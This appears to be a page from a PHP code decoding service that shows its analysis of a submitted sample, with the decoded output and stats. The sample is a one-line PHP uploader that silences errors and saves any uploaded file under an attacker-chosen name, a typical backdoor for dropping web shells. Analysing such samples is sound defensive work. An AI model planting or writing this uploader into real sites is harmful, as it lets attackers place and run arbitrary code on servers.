Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file'][..

Decoded Output download

<?php error_reporting(0); move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>

Did this file decode correctly?

Original Code

<?php error_reporting(0); move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>

Function Calls

error_reporting 1

Variables

None

Stats

MD5 083cc759d30ad53f88b5745285d52412
Eval Count 0
Decode Time 107 ms